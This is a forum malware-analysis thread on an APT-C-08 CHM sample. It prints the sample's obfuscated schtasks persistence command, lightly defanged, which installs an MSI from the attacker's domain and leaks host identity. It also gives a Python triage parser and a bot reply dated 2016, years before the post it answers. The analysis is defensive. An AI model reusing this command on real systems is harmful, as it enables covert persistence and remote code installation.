Malware Analysis APT-C-08 CHM Malicious


ShenguiTurmi (thread author), Feb 28, 2023
APT-C-08 is an APT organisation from India that mainly targets industrial/power/government sectors in China and Pakistan.
(The above introduction is from Qihoo, I am not responsible for the accuracy of the above introduction.)

Hash: c3fc4d145ce3cee06782753be269cad6632751fb9b824e1917b0de6e597ee2ee
Triage: Malware sandboxing report by Hatching Triage
Hybrid-Analysis: Free Automated Malware Analysis Service - powered by Falcon Sandbox

After the sample has run, they add a scheduled task and then try to download the final payload (in MSI format) from that address:
hxxp://mercifulnearyou(dot)com/FMCG/oli(dot)php
Here is the full shellcode (change "(xx)" to tt):
schtasks.exe /create /sc minute /mo 15 /tn GoogleService /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^(xx)^p://^m^e^rc^iful^nea^ry^ou.co^m/F^M^CG/^oli.p^hp^?^z^h=%username%*%computername% /^q^n ^/^norestart" /f

From observation, they turn off downloads the vast majority of the time (you can only download empty 0-byte files), and they only turn them on when they realise that the exact target has taken the bait.
Since there was no real target on the hook at this point, I couldn't get the full payload, so I didn't know the C2 address.
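To triage a command line like the one above without running it, the following script (added here; not from the original post or the sandbox reports) strips the cmd.exe caret escapes, pulls out the schtasks switches, and flags the two things a detection engineer would key on: msiexec quietly installing a remote package, and host identity (%username%, %computername%) leaking in the query string. The sample string is the command from the post, kept defanged ("(xx)" stands for "tt").

```python
import re

# Constructed input: the schtasks line from the post, still defanged.
SAMPLE = ('schtasks.exe /create /sc minute /mo 15 /tn GoogleService /tr '
          '"%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i h^(xx)^p://^m^e^rc^iful'
          '^nea^ry^ou.co^m/F^M^CG/^oli.p^hp^?^z^h=%username%*%computername% '
          '/^q^n ^/^norestart" /f')


def strip_carets(s: str) -> str:
    """cmd.exe treats '^' as an escape: '^x' means 'x'. The /tr string is
    re-parsed by %COMSPEC% /c when the task fires, so the carets vanish on
    that second pass and the real command line emerges."""
    return re.sub(r'\^(.)', r'\1', s)


def parse_schtasks(cmd: str) -> dict:
    """Return the schtasks switches plus indicators extracted from /tr."""
    # /tr is the double-quoted action; the other switches are single tokens.
    m = re.search(r'/tr\s+"([^"]*)"', cmd, re.IGNORECASE)
    action = strip_carets(m.group(1)) if m else ''
    info = {
        'schedule': re.search(r'/sc\s+(\S+)', cmd, re.I).group(1).lower(),
        'modifier': int(re.search(r'/mo\s+(\d+)', cmd, re.I).group(1)),
        'task_name': re.search(r'/tn\s+(\S+)', cmd, re.I).group(1),
        'action': action,
        # A high caret count on a one-liner is itself an obfuscation signal.
        'caret_count': cmd.count('^'),
    }
    url = re.search(r'\S+://\S+', action)
    info['url'] = url.group(0) if url else None
    # Indicator 1: msiexec /i <remote URL> with /qn (silent install from the web).
    info['msiexec_remote_quiet'] = bool(
        re.search(r'msiexec\s+/i\s+\S+://', action, re.I)) and '/qn' in action.lower()
    # Indicator 2: environment variables expanded into the URL leak host identity.
    info['leaks_env'] = bool(re.findall(r'%(\w+)%', url.group(0))) if url else False
    return info


if __name__ == '__main__':
    for key, value in parse_schtasks(SAMPLE).items():
        print(f'{key}: {value}')
```

The same parser works on any schtasks /create line captured from process-creation logs (Sysmon event 1 or Windows 4688); the task name "GoogleService" and the 15-minute retry interval are the hunting pivots this sample offers.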

Bot (AI-powered Bot), Apr 21, 2016
Thank you for sharing this information about APT-C-08 and the specific sample you analyzed. It's important to raise awareness about such targeted attacks. Based on the provided shellcode, it seems that the attackers are creating a scheduled task that runs every 15 minutes. The task attempts to download a final payload in MSI format from the URL specified. However, it appears that the attackers have measures in place to minimize detection, as they only enable downloads when they believe their specific target has taken the bait.

It's unfortunate that you were not able to obtain the full payload or the command and control (C2) address due to the absence of a real target. Malware analysis can be challenging, but even partial information can be valuable in understanding the behavior and techniques used by threat actors. Thank you for sharing your findings, and I hope this information contributes to the continued efforts in combating APT threats.